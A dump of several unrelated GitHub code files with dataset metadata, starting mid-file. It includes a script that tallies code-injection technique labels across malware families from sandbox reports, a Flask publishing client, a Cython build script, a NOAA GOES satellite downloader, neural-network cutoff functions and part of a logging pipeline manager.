is_all_same_behavior(self):\n if len(self.positive_samples) < len(self.included_samples):\n return len(self.positive_samples) == 0\n\n expected = None\n for sample, behaviors in self.positive_samples.items():\n if expected is None:\n expected = behaviors\n elif expected != behaviors:\n return False\n\n return True\n\n def __repr__(self):\n return f\"{self.name}\"\n\n# Read individual sample reports and build up map from sample hash to detected behaviors.\nsample_summaries = dict()\nsamples_per_year = {y: set() for y in YEARS}\nexcluded = 0\n\nfor year in YEARS:\n \"\"\"\n Base directory of all reports and log files.\n \"\"\"\n BASE_DIR = f\"reports/{year}\"\n\n \"\"\"\n The glob for all summary files produced by the analyzer.\n \"\"\"\n SUMMARY_PATH = f\"{BASE_DIR}/summaries/*.log\"\n\n \"\"\"\n The directory storing all raw drakvuf logs. This is used to convert drakvuf IDs in a summary.log to sample hashes.\n \"\"\"\n DRAKVUF_PATH = f\"{BASE_DIR}/drakvuf-logs\"\n\n print(SUMMARY_PATH)\n for summary_path in glob.glob(SUMMARY_PATH):\n print(\"Processing\", summary_path)\n for line in tqdm.tqdm(open(summary_path, \"r\").readlines()):\n entry = json.loads(line)\n path = entry['File']\n checksum = None\n\n if \"Hash\" in entry:\n # If hash is in the entry (old version of analyzer didn't save this), then just use it.\n checksum = entry[\"Hash\"]\n if checksum == \"<unknown>\":\n checksum = None\n\n if checksum is None:\n if path.endswith(\".exe\"):\n # If path is an exe path, this exe's name is the hash itself.\n checksum = path[path.rfind('/')+1:-4]\n else:\n # Otherwise, path is a drakvuf report path, we can find the sample hash in the drakrun.log.\n checksum = None\n drakvuf_id = path[path.rfind('/')+1:]\n path = f\"{DRAKVUF_PATH}/{drakvuf_id}/drakrun.log\"\n\n if not os.path.isfile(path):\n excluded += 1\n sys.stderr.write(f\"[!] Could not find '{path}'.\\n\")\n continue\n\n for x in open(path, \"r\").readlines():\n idx = x.find(\"SHA256: \")\n if idx != -1:\n checksum = x[idx+8:-3]\n break\n\n if checksum is None:\n excluded += 1\n sys.stderr.write(f\"[!] {path} does not contain sample hash.\\n\")\n continue\n\n detected_behaviors = entry[\"DetectedBehaviors\"]\n if CORRECT:\n if \"Process Hollowing\" in detected_behaviors and \"Thread Hijacking\" in detected_behaviors:\n detected_behaviors.remove(\"Thread Hijacking\")\n\n if checksum in sample_summaries:\n sample_summaries[checksum].update(detected_behaviors)\n else:\n sample_summaries[checksum] = set(detected_behaviors)\n\n samples_per_year[year].add(checksum)\n\n\nfor sample in sample_summaries:\n years = []\n for (year, samples) in samples_per_year.items():\n if sample in samples:\n years.append(year)\n if len(years) > 1:\n sys.stderr.write(f\"[!] 
Sample {sample} appears in multiple years: {years}\\n\")\n\n\nif not NORMALIZE:\n # Construct mapping from behavior to set of samples implementing said behavior.\n total_positives = 0\n behavior_to_samples = dict()\n technique_adoption_counts = dict()\n for sample_hash, behaviors in sample_summaries.items():\n if len(behaviors) > 0:\n total_positives += 1\n\n count = len(behaviors)\n if count > 0:\n technique_adoption_counts[count] = technique_adoption_counts.get(count, 0) + 1\n\n for behavior in behaviors:\n if behavior not in behavior_to_samples:\n behavior_to_samples[behavior] = set()\n behavior_to_samples[behavior].add(sample_hash)\n\n print(\"\")\n print(\"Number of included samples:\", len(sample_summaries))\n print(\"Number of excluded samples:\", excluded)\n print(f\"Positive samples: {total_positives} ({total_positives/len(sample_summaries)*100:.2f}%)\")\n print(\"\")\n print(f\"{'Technique':>30} Nr of samples Frac of positive samples\")\n for b, fs in sorted(behavior_to_samples.items(), key=lambda x: -len(x[1])):\n print(f\"{b:>30}: {len(fs):>13} {len(fs)*100.0/total_positives:>25.2f}%\")\n\n print(\"\")\n print(f\"{'Nr of Techniques':>30} Nr of samples Frac of positive samples\")\n for c, fs in sorted(technique_adoption_counts.items(), key=lambda x: -x[1]):\n print(f\"{c:>30}: {fs:>13} {fs*100.0/total_positives:>25.2f}%\")\n sys.exit(0)\n\n\nfamilies = dict() # name -> family\nhash_to_family = dict() # hash -> family\nunclassified = FamilyStatistics(\"~unclassified~\")\n\n# Check if classification.txt exists, and if not, regenerate using avclass.\nfor year in YEARS:\n \"\"\"\n Base directory of all reports and log files.\n \"\"\"\n BASE_DIR = f\"reports/{year}\"\n \n \"\"\"\n The path to the file containing a mapping from hash to malware family, as produced by AVClass.\n \"\"\"\n CLASSIFICATION_PATH = f\"{BASE_DIR}/samples/classification.txt\"\n\n \"\"\"\n The path to the directory containing metadata files of all malware samples in a set.\n \"\"\"\n METADATA_PATH = f\"{BASE_DIR}/samples/Win32_EXE\"\n \n if not os.path.isfile(CLASSIFICATION_PATH) or os.path.getsize(CLASSIFICATION_PATH) == 0 or FORCE_RECLASSIFY:\n print(f\"{CLASSIFICATION_PATH} does not exist. Regenerating from {METADATA_PATH}...\")\n if not os.path.isdir(METADATA_PATH):\n sys.stderr.write(f\"[!] {METADATA_PATH} does not exist. Aborting...\\n\")\n sys.exit(1)\n\n if len(os.listdir(METADATA_PATH)) == 0:\n sys.stderr.write(f\"[!] {METADATA_PATH} is empty. 
Aborting...\\n\")\n sys.exit(1)\n\n with open(CLASSIFICATION_PATH, \"w\") as f, open(\"/tmp/classify.tmp\", \"w\") as e:\n result = subprocess.run(\n [\"python3\", \"avclass/avclass/avclass_labeler.py\", \"-vtdir\", METADATA_PATH, \"-hash\", \"sha256\"],\n stdout=f,\n stderr=e\n )\n\n if result.returncode != 0:\n with open(\"/tmp/classify.tmp\", \"r\") as e:\n sys.stderr.write(e.read())\n sys.exit(result.returncode)\n\n # Parse classification file.\n for line in open(CLASSIFICATION_PATH, \"r\").readlines():\n [sample_hash, family] = line.split('\\t')\n family_name = family.strip()\n family = families.get(family_name)\n \n if family is None:\n # Create a new family if it doesn't exist yet.\n family = FamilyStatistics(family_name)\n families[family_name] = family\n\n # Collect all singleton families, since we want to group these together in the end \n # in the family distribution overview.\n if family.is_singleton():\n unclassified.all_samples.add(sample_hash)\n\n family.all_samples.add(sample_hash)\n hash_to_family[sample_hash] = family\n\n\n# Find out which samples were included in each family.\nnot_found = 0\nfor sample_hash, behaviors in sample_summaries.items():\n family = hash_to_family.get(sample_hash)\n if family is None:\n # This is a family that wasn't specified in the classification.txt, assume it's a singleton family.\n not_found += 1\n family = FamilyStatistics(\"SINGLETON:\" + sample_hash)\n family.add_and_include(sample_hash)\n unclassified.add_and_include(sample_hash)\n continue\n\n family.add_and_include(sample_hash)\n if len(behaviors) > 0:\n x = family.positive_samples.get(sample_hash)\n if x is None:\n x = set()\n family.positive_samples[sample_hash] = x\n x.update(behaviors)\n\n# Filter out families with no included samples.\nfamilies = { n: f for (n, f) in families.items() if len(f.included_samples) > 0 }\n\n# Construct mapping from behavior to set of families implementing said behavior.\nbehavior_to_families = dict()\ncounts_at_least_one = 0\ncounts_all_same = 0\nfor _, family in families.items():\n if family.has_positives():\n counts_at_least_one += 1\n if family.is_all_same_behavior():\n counts_all_same += 1\n\n for behavior in family.get_detected_behaviors():\n if behavior not in behavior_to_families:\n behavior_to_families[behavior] = set()\n behavior_to_families[behavior].add(family)\n\nprint(\"\")\nprint(\"Number of included samples:\", len(sample_summaries))\nprint(\"Number of excluded samples:\", excluded)\nprint(\"Number of families:\", len(families))\nprint(\"Number of samples missing in classification:\", not_found)\nprint(f\"All same behavior: {counts_all_same} ({counts_all_same*100.0/len(families):.2f}%)\")\nprint(f\"At least one injection: {counts_at_least_one} ({counts_at_least_one*100.0/len(families):.2f}%)\")\nprint(\"\")\n\nprint(\"Family Distribution:\")\nprint(\"\")\n#\n# top_family_count = 18\n# top_families = dict(sorted(families.items(), key=lambda x: -len(x[1].included_samples))[:top_family_count])\n# top_family_names = sorted(families.keys(), key=lambda x: -len(families[x].included_samples))[:top_family_count]\ntop_family_names = [\n \"virlock\",\n \"dinwod\",\n \"sivis\",\n \"berbew\",\n \"upatre\",\n \"virut\",\n \"delf\",\n \"kolabc\",\n \"vobfus\",\n \"wapomi\",\n \"wabot\",\n \"vindor\",\n \"allaple\",\n \"gator\",\n \"hematite\",\n \"vtflooder\",\n \"shipup\",\n \"gepys\",\n]\ntop_families = {n:f for n,f in families.items() if n in top_family_names}\n\nother = FamilyStatistics(\"Other\")\nfor name, family in families.items():\n if name in 
top_families:\n continue\n other.included_samples.update(family.included_samples)\n other.positive_samples.update(family.positive_samples)\n\nother.included_samples.update(unclassified.included_samples)\nother.positive_samples.update(unclassified.positive_samples)\n\ndef print_family_stats(family):\n short_names = {\n \"Process Hollowing\": \"Hollow\",\n \"Thread Hijacking\": \"Thread\",\n \"CTray VTable\": \"CTray\",\n \"APC Shell Injection\": \"APCShl\",\n \"APC DLL Injection\": \"APCDll\",\n \"Generic Shell Injection\": \"Shell\",\n \"Classic DLL Injection\": \"DLL\",\n \"Shim Injection\": \"Shim\",\n \"Image File Execution Options\": \"IFEO\",\n \"AppInit DLL Injection\": \"AppInit\",\n \"AppCertDlls Injection\": \"AppCert\",\n \"COM Hijack DLL Injection\": \"COM\",\n \"SetWindowsHookEx DLL Injection\": \"WinHook\"\n }\n\n print(f\"{family.name:>17} & {len(family.included_samples):>5} & {family.get_positive_rate()*100:>6.2f}\\\\% & {short_names.get(family.get_preferred_behavior()) or family.get_preferred_behavior() or ' ':>7} &\")\n\n\n#for _, family in sorted(top_families.items(), key=lambda x: -len(x[1].included_samples)):\nfor name in top_family_names:\n print_family_stats(top_families.get(name) or FamilyStatistics(name))\nprint_family_stats(other)\n\nprint(\"\")\nprint(f\"{'Technique':>30} Nr of Families Frac of positive families\")\nfor b, fs in sorted(behavior_to_families.items(), key=lambda x: -len(x[1])):\n sorted_fs = sorted(fs, key=lambda x: -len(x.included_samples))\n s = \", \".join(f.name for f in sorted_fs if not f.is_singleton())\n print(f\"{b:>30}: {len(fs):>14} {len(fs)*100.0/counts_at_least_one:>26.2f}%\")\n\nprint(\"\")\n", "repo_name": "utwente-scs/code-injection-malware", "sub_path": "src/scripts/calculate_stats.py", "file_name": "calculate_stats.py", "file_ext": "py", "file_size_in_byte": 13777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 28, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 112, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 114, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 137, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 137, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 148, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 170, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 170, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 231, 
"usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 231, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 232, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 234, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 235, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 235, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 236, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 239, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 247, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 247, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 248, "usage_type": "call"}]} +{"seq_id": "73723862045", "text": "import os\r\nimport requests\r\nimport json\r\nfrom storyutils import *\r\nfrom datetime import datetime, timedelta, date\r\nfrom collections import OrderedDict\r\nfrom flask import Flask, jsonify, request\r\napp = Flask(__name__)\r\n\r\n\r\nstory_api = os.environ['EC_STORY_API']\r\nstory_api_token = os.environ['EC_API_TOKEN']\r\nstory_author_id = os.environ['STORY_AUTHOR_ID']\r\nstory_owner = os.environ['STORY_OWNER']\r\n\r\nauth_header = {\"Authorization\": \"Bearer \" + story_api_token}\r\n\r\nelements = []\r\n\r\nelements.append([\"Test de publica\", \"DISTRITOS CALLAO CALLAO CERCADO\"])\r\n\r\n@app.route(\"/elections\")\r\ndef elections():\r\n now = datetime.now()\r\n dateStory = now-timedelta(days=30)\r\n draftUri = story_api + \"/draft/v1/story\"\r\n\r\n dataStory = {\"creationDate\": dateStory, \"story_author_id\": story_author_id, \"story_owner\": story_owner}\r\n i = 0\r\n # for region in elements:\r\n # for element in region:\r\n # dataStory[\"title\"] = element\r\n # ans = getANSElectionsStory(dataStory)\r\n # draftResponse = requests.request(\"POST\", draftUri, headers=auth_header, data=json.dumps(ans))\r\n # document= json.loads(draftResponse.text)\r\n\r\n # print(element + \": \" + document[\"id\"])\r\n # i += 1\r\n ans = getANSTaggedStory(dataStory)\r\n draftResponse = requests.request(\"POST\", draftUri, headers=auth_header, data=json.dumps(ans))\r\n document= json.loads(draftResponse.text)\r\n\r\n print(\"=> \" + document[\"id\"])\r\n\r\n return \"Finish\"\r\n\r\n@app.route(\"/test\")\r\ndef test():\r\n stories = [{\"title\": \"Titular de Peru21\", \"tags\": [\r\n {\r\n \"description\": \"Tag nuevo 1\",\r\n \"slug\": \"tag-nuevo-1\",\r\n \"text\": \"Tag nuevo 1\"\r\n },\r\n {\r\n \"description\": \"Prueba de Walter\",\r\n \"slug\": \"prueba-de-walter\",\r\n \"text\": \"PRueba de Walter\"\r\n },\r\n ]}, \r\n {\"title\": \"Prueba de historia Trome\", \"tags\": [\r\n {\r\n \"description\": \"Año Nuevo\",\r\n \"slug\": \"ano-nuevo\",\r\n \"text\": \"Año Nuevo\"\r\n },\r\n {\r\n \"description\": \"Sergio Castellón\",\r\n \"slug\": \"sergio-castellon\",\r\n \"text\": \"Sergio Castellón\"\r\n },\r\n ]}\r\n ]\r\n\r\n\r\n\r\n now = datetime.now()\r\n dateStory = now-timedelta(days=30)\r\n draftUri = story_api + \"/draft/v1/story\"\r\n\r\n dataStory = {\"creationDate\": dateStory, \"story_author_id\": story_author_id, \"story_owner\": story_owner}\r\n for element in stories:\r\n dataStory[\"title\"] = element[\"title\"]\r\n dataStory[\"tags\"] = element[\"tags\"]\r\n ans = getANSStory(dataStory)\r\n draftResponse = requests.request(\"POST\", draftUri, headers=auth_header, data=json.dumps(ans))\r\n document= json.loads(draftResponse.text)\r\n\r\n print(element[\"title\"] + \": \" + document[\"id\"])\r\n\r\n 
return \"Finish 2\"", "repo_name": "ljbustamante/arc-publisher", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3047, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "37719176918", "text": "#! /usr/bin/python\n\"\"\"\npython项目编译脚本\nusage: ./compiler path/to/project n\n 其中n是编译进程数量,默认为机器的核心数\nexample: ./compiler.py ./data-exchange-platform/ 256\n\"\"\"\nimport os\nimport signal\nimport sys\nfrom multiprocessing import cpu_count, Pool\n\nignored = [\"migrations\", '__init__.py', 'manage.py']\n\n\ndef dir_travel(path):\n \"\"\"遍历目录\"\"\"\n for root, dirs, files in os.walk(path):\n for file in files:\n yield root, file\n\n\ndef batch_compiler(path, process):\n \"\"\"整体处理逻辑\"\"\"\n backup_dir(path) # 备份项目目录\n install_cython()\n process_pool = Pool(processes=process)\n for root, file in dir_travel(path):\n process_pool.apply_async(compile_path, (root, file), error_callback=throw_error)\n process_pool.close()\n process_pool.join()\n rm_build()\n\n\ndef throw_error(e):\n print(\"~~~~~~~~~~~~~~~~COMPILER ERROR~~~~~~~~~~~~~~~~~~\", e.__cause__)\n os.killpg(os.getpgid(os.getpid()), signal.SIGKILL)\n\n\ndef compile_path(root, file):\n try:\n if root.endswith(\"migrations\") or file in ignored:\n return\n\n if file.endswith(\".py\"):\n # 项目内部目录路径 组成字符串 用于标识不同路径下的同名文件\n unique_path = \"_\".join([\"_\".join(root.strip(\"./\").split(\"/\")[1:]), file[:-3]])\n file_path = os.path.join(root, file) # 文件全路径或相对当前目录的路径\n print(\"current filename: \", file_path)\n adjust_script_content(file_path, unique_path) # 修改setup.py最后一行中的文件名\n compile_file(unique_path) # 编译文件\n rm_file(file_path) # 删除py文件\n move_so_to(file, root, unique_path) # 将so文件从build目录移到py文件目录\n except Exception as e:\n print(e)\n raise e\n\n\ndef compile_file(unique_path):\n \"\"\"编译为so文件\"\"\"\n cmd = f\"\"\"python {unique_path}_setup.py build_ext\"\"\"\n os.system(cmd)\n\n\ndef move_so_to(file, root, unique_path):\n \"\"\"file是原文件名,root是目标路径,unique_path用于区分不同路径下的同名文件\"\"\"\n if not os.path.isdir(root):\n raise Exception(f\"{root}不是目录\")\n file = file[:-3] # 删除.py\n source = search_file(file, unique_path)\n # source = f\"./build/lib.linux-x86_64-3.6/{new_path}/{file}.*.so\"\n destination = 
f\"{root}/{file}.so\"\n cmd = f\"\"\"mv {source} {destination}\"\"\"\n os.system(cmd)\n c_file = os.path.join(root, file + \".c\")\n cmd = f\"\"\"rm {c_file}\"\"\"\n os.system(cmd)\n cmd = f\"\"\"rm {unique_path}_setup.py\"\"\"\n os.system(cmd)\n\n\ndef search_file(target, unique_path):\n root = \"./build\"\n # 第一遍按匹配目标路径\n for dir_name, file in dir_travel(root):\n u_path = \"_\".join([dir_name.strip(\"./\").replace(\"/\", \"_\"), file])\n if file.endswith(\".so\") and file.startswith(target) and unique_path in u_path:\n return os.path.join(dir_name, file)\n # 第二遍全局搜索\n for dir_name, file in dir_travel(root):\n if file.endswith(\".so\") and file.startswith(target):\n return os.path.join(dir_name, file)\n\n raise Exception(f\"未找到文件{target}, unique_path {unique_path}\")\n\n\ndef file_exists_in_path(file, path):\n \"\"\"查找当前目录及其父级目录中是否存在特定文件\"\"\"\n path = path.strip(\"./\")\n if os.path.exists(\"/\".join([path, file])):\n return True\n return False\n\n\ndef adjust_script_content(file_path, unique_path):\n \"\"\"两处文件需要修改\"\"\"\n adjust_setup(file_path, unique_path)\n adjust_file_header(file_path)\n\n\ndef adjust_file_header(file_path):\n \"\"\"在文件头部加上一行指定解释器版本\"\"\"\n cmd = f\"\"\"sed -i '1i\\# cython: language_level=3' {file_path}\"\"\"\n os.system(cmd)\n\n\ndef adjust_setup(file_path, unique_path):\n \"\"\"将第三行中的文件名替换为当前文件名\"\"\"\n cmd = f\"\"\"echo \"from distutils.core import setup\nfrom Cython.Build import cythonize\nsetup(ext_modules=cythonize(['{file_path}']))\n\" > {unique_path}_setup.py\"\"\"\n os.system(cmd)\n\n\ndef rm_file(file_path):\n \"\"\"删除py文件\"\"\"\n os.remove(file_path)\n\n\ndef backup_dir(path):\n cmd = f\"\"\"rm /tmp/{path}\"\"\"\n os.system(cmd)\n cmd = f\"\"\"cp -r {path} /tmp/{path}\"\"\"\n os.system(cmd)\n\n\ndef restore_dir(path):\n cmd = f\"\"\"rm -rf {path}\"\"\"\n os.system(cmd)\n cmd = f\"\"\"mv {path}_backup {path}\"\"\"\n os.system(cmd)\n\n\ndef rm_build():\n cmd = f\"\"\"rm -rf build\"\"\"\n os.system(cmd)\n cmd = f\"\"\"rm -f setup.py\"\"\"\n os.system(cmd)\n\n\ndef execute_command(cmd):\n os.popen(cmd)\n\n\ndef install_cython():\n cmd = \"pip install Cython -i https://pypi.doubanio.com/simple/\"\n os.system(cmd)\n\n\nif __name__ == '__main__':\n path_ = sys.argv[1]\n n = cpu_count()\n if len(sys.argv) > 2:\n n = int(sys.argv[2])\n batch_compiler(path_, n)\n", "repo_name": "super-tramper/python_compiler", "sub_path": "compiler.py", "file_name": "compiler.py", "file_ext": "py", "file_size_in_byte": 4877, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.walk", "line_number": 18, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 27, "usage_type": "call"}, {"api_name": "os.killpg", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getpgid", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 37, "usage_type": "call"}, {"api_name": "signal.SIGKILL", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 75, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 77, "usage_type": "call"}, {"api_name": "os.system", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 114, "usage_type": "call"}, {"api_name": "os.system", "line_number": 123, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 128, "usage_type": "call"}, {"api_name": "os.system", "line_number": 133, "usage_type": "call"}, {"api_name": "os.system", "line_number": 135, "usage_type": "call"}, {"api_name": "os.system", "line_number": 140, "usage_type": "call"}, {"api_name": "os.system", "line_number": 142, "usage_type": "call"}, {"api_name": "os.system", "line_number": 147, "usage_type": "call"}, {"api_name": "os.system", "line_number": 149, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 153, "usage_type": "call"}, {"api_name": "os.system", "line_number": 158, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 162, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 163, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 164, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 165, "usage_type": "attribute"}]} +{"seq_id": "37039612978", "text": "import s3fs\nimport numpy as np\nimport datetime as dt\n\n\ndef to_julian_day(year, month, day): \n date = dt.datetime.strptime('%d-%d-%d'%(year,month, day), '%Y-%m-%d') \n return str(date.timetuple().tm_yday).zfill(3)\n\n\ndef downloadABI(**kargs):\n if kargs.get('day'):\n day = kargs.get('day')\n if kargs.get('month'):\n month = kargs.get('month')\n if kargs.get('year'):\n year = kargs.get('year')\n \n julian_day = to_julian_day(year, month, day)\n bucket = 'noaa-goes17/ABI-L2-CMIPF' \n query = aws.ls('%s/%d/%s'%(bucket, year, julian_day))\n \n \n hours = np.array(query) \n\n for hour in hours:\n files = aws.ls(hour)\n for file in files:\n print('Downloading %s...'%file.split('/')[-1])\n aws.get(file, file.split('/')[-1]) \n# fs.get(files[0], files[0].split('/')[-1])\n\n# print(files)\n\n\nif __name__ == \"__main__\":\n DAY=1\n MONTH=1\n YEAR=2019\n aws = s3fs.S3FileSystem(anon=True) \n\n downloadABI(day=DAY, month=MONTH, year=YEAR)\n", "repo_name": "AdrianoPereira/cap378", "sub_path": "downloadgoes.py", "file_name": "downloadgoes.py", "file_ext": "py", "file_size_in_byte": 1050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "s3fs.S3FileSystem", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "7024447822", "text": "import math\nimport torch\n\n\n@torch.jit.script\ndef cosine_cutoff(x: torch.Tensor, r_max: torch.Tensor, r_start_cos_ratio: float = 0.8):\n \"\"\"A piecewise cosine cutoff starting the cosine decay at r_decay_factor*r_max.\n\n Broadcasts over r_max.\n \"\"\"\n r_max, x = 
torch.broadcast_tensors(r_max.unsqueeze(-1), x.unsqueeze(0))\n r_decay: torch.Tensor = r_start_cos_ratio * r_max\n # for x < r_decay, clamps to 1, for x > r_max, clamps to 0\n x = x.clamp(r_decay, r_max)\n return 0.5 * (torch.cos((math.pi / (r_max - r_decay)) * (x - r_decay)) + 1.0)\n\n\n@torch.jit.script\ndef polynomial_cutoff(\n x: torch.Tensor, r_max: torch.Tensor, p: float = 6.0\n) -> torch.Tensor:\n \"\"\"Polynomial cutoff, as proposed in DimeNet: https://arxiv.org/abs/2003.03123\n\n\n Parameters\n ----------\n r_max : tensor\n Broadcasts over r_max.\n\n p : int\n Power used in envelope function\n \"\"\"\n assert p >= 2.0\n r_max, x = torch.broadcast_tensors(r_max.unsqueeze(-1), x.unsqueeze(0))\n x = x / r_max\n\n out = 1.0\n out = out - (((p + 1.0) * (p + 2.0) / 2.0) * torch.pow(x, p))\n out = out + (p * (p + 2.0) * torch.pow(x, p + 1.0))\n out = out - ((p * (p + 1.0) / 2) * torch.pow(x, p + 2.0))\n\n return out * (x < 1.0)\n", "repo_name": "mir-group/allegro", "sub_path": "allegro/nn/cutoffs.py", "file_name": "cutoffs.py", "file_ext": "py", "file_size_in_byte": 1247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 244, "dataset": "github-code", "pt": "88", "api": [{"api_name": "torch.Tensor", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.broadcast_tensors", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.cos", "line_number": 15, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.jit", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.broadcast_tensors", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.jit", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "36441623229", "text": "\"\"\"This module contains functionality to manage pipelines via multi-processing.\"\"\"\n# pylint: disable=logging-fstring-interpolation\n\nimport logging\nimport logging.handlers\nimport multiprocessing\n\nfrom logprep.framework.pipeline import MultiprocessingPipeline\nfrom logprep.util.configuration import Configuration\nfrom logprep.util.prometheus_exporter import PrometheusStatsExporter\n\n\nclass PipelineManagerError(Exception):\n \"\"\"Base class for pipeline related exceptions.\"\"\"\n\n\nclass MustSetConfigurationFirstError(PipelineManagerError):\n \"\"\"Raise if configuration was not set.\"\"\"\n\n def __init__(self, what_failed: str):\n super().__init__(f\"Failed to {what_failed}: Configuration is unset\")\n\n\nclass PipelineManager:\n \"\"\"Manage pipelines via multi-processing.\"\"\"\n\n def __init__(self):\n self.prometheus_exporter = None\n self._logger = logging.getLogger(\"Logprep PipelineManager\")\n self.log_queue = multiprocessing.Queue(-1)\n self._queue_listener = logging.handlers.QueueListener(self.log_queue)\n self._queue_listener.start()\n\n self._pipelines = []\n self._configuration = None\n\n self._lock = multiprocessing.Lock()\n self._shared_dict = None\n self._used_server_ports = None\n\n def set_configuration(self, configuration: Configuration):\n \"\"\"set the verified config\"\"\"\n 
